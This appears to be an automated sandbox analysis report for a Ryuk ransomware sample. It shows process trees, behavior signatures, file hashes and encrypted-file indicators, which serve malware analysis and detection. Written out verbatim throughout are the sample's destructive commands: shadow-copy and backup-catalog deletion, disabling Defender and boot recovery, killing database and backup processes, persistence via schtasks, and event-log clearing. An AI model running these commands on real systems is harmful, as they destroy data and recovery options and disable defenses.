PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1840 wrote to memory of 616 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1100 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1468 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe C:\Windows\system32\cmd.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1100 wrote to memory of 984 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 1392 wrote to memory of 844 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe" /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\system32\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\system32\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\system32\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit

C:\Windows\system32\cmd.exe

cmd.exe /c "C:\ProgramData\RyukReadMe.txt "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd.exe /c vssadmin Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

cmd.exe /c wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

cmd.exe /c wbadmin delete catalog -quiet/

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} boostatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop avpsus /y

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 stop avpsus /y

C:\Windows\system32\wbadmin.exe

wbadmin delete catalog -quiet/

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled no

C:\Windows\system32\net.exe

net stop avpsus /y

C:\Windows\system32\cmd.exe

cmd.exe /c bcdedit /set {default} recoveryenabled no

C:\Windows\system32\vssadmin.exe

vssadmin Delete Shadows /All /Quiet

Network

N/A

Files

memory/1416-54-0x0000000000000000-mapping.dmp

memory/1776-55-0x0000000000000000-mapping.dmp

memory/1376-56-0x0000000000000000-mapping.dmp

C:\ProgramData\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/1064-58-0x0000000000000000-mapping.dmp

memory/296-59-0x0000000000000000-mapping.dmp

memory/592-60-0x0000000000000000-mapping.dmp

memory/1936-61-0x0000000000000000-mapping.dmp

memory/1368-62-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 a57e1e6fe1c98d2e75799a46e9eb5797
SHA1 7878e7042c355546c118a38b90d8f7221f74d8a4
SHA256 8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe
SHA512 5764f3b1971f64c9d55f387524d92038350dbdf9a7195dc7e3f7b83760d93f45e73dd4c4af6cc597add838acd2d4a4e5b7a96a3444e3c8b0369b1d487621909d

memory/464-64-0x0000000000000000-mapping.dmp

memory/1136-65-0x0000000000000000-mapping.dmp

memory/1780-66-0x0000000000000000-mapping.dmp

memory/288-67-0x0000000000000000-mapping.dmp

memory/1924-68-0x0000000000000000-mapping.dmp

memory/832-69-0x0000000000000000-mapping.dmp

memory/1672-70-0x0000000000000000-mapping.dmp

memory/1556-71-0x0000000000000000-mapping.dmp

memory/1840-72-0x0000000000000000-mapping.dmp

memory/616-73-0x0000000000000000-mapping.dmp

memory/1392-75-0x0000000000000000-mapping.dmp

memory/1100-74-0x0000000000000000-mapping.dmp

memory/984-76-0x0000000000000000-mapping.dmp

memory/1096-79-0x0000000000000000-mapping.dmp

memory/2004-78-0x0000000000000000-mapping.dmp

memory/844-77-0x0000000000000000-mapping.dmp

memory/2040-80-0x0000000000000000-mapping.dmp

memory/1760-83-0x0000000000000000-mapping.dmp

C:\ProgramData\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

memory/1968-84-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

C:\ProgramData\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

memory/1012-87-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 85a6d10468885323e5dc2549da732a02
SHA1 60b074142818f87396012ba26b18cf17108210f8
SHA256 07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA512 4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

C:\ProgramData\RYUKID

MD5 85a6d10468885323e5dc2549da732a02
SHA1 60b074142818f87396012ba26b18cf17108210f8
SHA256 07cf5118df0fde1dc7a5bdbf24ae5390261749c07d0b94672e2b2c088f23057a
SHA512 4ca41b64f8b91d1fffd6664c35cfab2fed5b6be0511c657efa1bde7ef15883c2d20885e083717c3b41bec651c992615a75621a78c57a375087a52d9328ca0607

C:\ProgramData\hrmlog2

MD5 15c189b77237ef2f94a84437c8cfc21c
SHA1 56220c87147712076222f778b1e5e5088db0865d
SHA256 e77ca6229b178b5b01e2a5d7e710449e2a9e1a60bc00025d600b9b11b842b3bd
SHA512 7d6cf12cf143bf789475832fe971ea9440bf05c6eff2780a76627b4f378866f547ce78dc9550e8fe98d203b43528fedfbe7fd04a185d110ed3f75cbdd41e6de6

C:\ProgramData\hrmlog1

MD5 4525d98c2b8f6b5d5acfc9857a6ee0a0
SHA1 e1c4a28a58a0399adaf155e9d064d986160645dd
SHA256 58fb788c91fe8c1224ec5f520af676fcd4cb0be2b7764da33173ded702865d63
SHA512 5652016bbfea5578a91ebc6f8ae1a93b55d15ae5c2e9839c91a5f624e0923a42b70cd32ae92b19f931b41d39aed0193be0c8ea17031767a8b4c0795c9307ad49

memory/1516-91-0x0000000000000000-mapping.dmp

memory/1736-93-0x0000000000000000-mapping.dmp

C:\ProgramData\RyukReadMe.txt

MD5 23cb6bce418d720b600fb36625cea4df
SHA1 8f4018131e41187445688df8cbda01119efff157
SHA256 4ef805e48ac50fda04eeffff3a725481151dd1dccaf462c02105aa27f630e136
SHA512 18bd24abd2d55a288933d8b1ce363e5a92703c1c25758ce3d6e52a3b3a25b00d70194fa73520f819afa0080c09866235a22c5c5785ecea2ecd1b5feca36a66b5

memory/1608-95-0x0000000000000000-mapping.dmp

memory/1496-96-0x0000000000000000-mapping.dmp

memory/1776-97-0x0000000000000000-mapping.dmp

memory/1376-98-0x0000000000000000-mapping.dmp

memory/1064-99-0x0000000000000000-mapping.dmp

memory/332-100-0x0000000000000000-mapping.dmp

memory/540-101-0x0000000000000000-mapping.dmp

memory/1700-102-0x0000000000000000-mapping.dmp

memory/1468-103-0x000007FEFC5A1000-0x000007FEFC5A3000-memory.dmp

memory/1968-104-0x0000000000000000-mapping.dmp

memory/844-105-0x0000000000000000-mapping.dmp

memory/696-106-0x0000000000000000-mapping.dmp

memory/592-107-0x0000000000000000-mapping.dmp

memory/1404-108-0x0000000000000000-mapping.dmp

memory/288-110-0x0000000000000000-mapping.dmp

memory/1620-113-0x0000000000000000-mapping.dmp

memory/840-112-0x0000000000000000-mapping.dmp

memory/1612-114-0x0000000000000000-mapping.dmp

memory/1420-119-0x0000000000000000-mapping.dmp

memory/1112-121-0x0000000000000000-mapping.dmp

memory/1680-118-0x0000000000000000-mapping.dmp

memory/988-123-0x0000000000000000-mapping.dmp

memory/772-122-0x0000000000000000-mapping.dmp

memory/1164-124-0x0000000000000000-mapping.dmp

memory/1728-125-0x0000000000000000-mapping.dmp

memory/1760-120-0x0000000000000000-mapping.dmp

memory/1708-116-0x0000000000000000-mapping.dmp

memory/524-117-0x0000000000000000-mapping.dmp

memory/1944-115-0x0000000000000000-mapping.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-11-10 06:20

Reported

2022-11-10 06:23

Platform

win10v2004-20220901-en

Max time kernel

150s

Max time network

153s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe"

Signatures

Ryuk

ransomware ryuk

Clears Windows event logs

evasion ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A
N/A N/A C:\Windows\system32\wevtutil.exe N/A

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Deletes backup catalog

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\wbadmin.exe N/A

Disables Task Manager via registry modification

evasion

Disables taskbar notifications via registry modification

evasion

Disables use of System Restore points

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\system32\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\F: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\D: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\f: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\h: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\e: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\g: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\vssadmin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\fr-fr\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.zh_CN_5.5.0.165303.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\8c983fc99712412b33c356e0fbba3e58ca1ca0501537ea11c81cba0198442abe.exe N/A
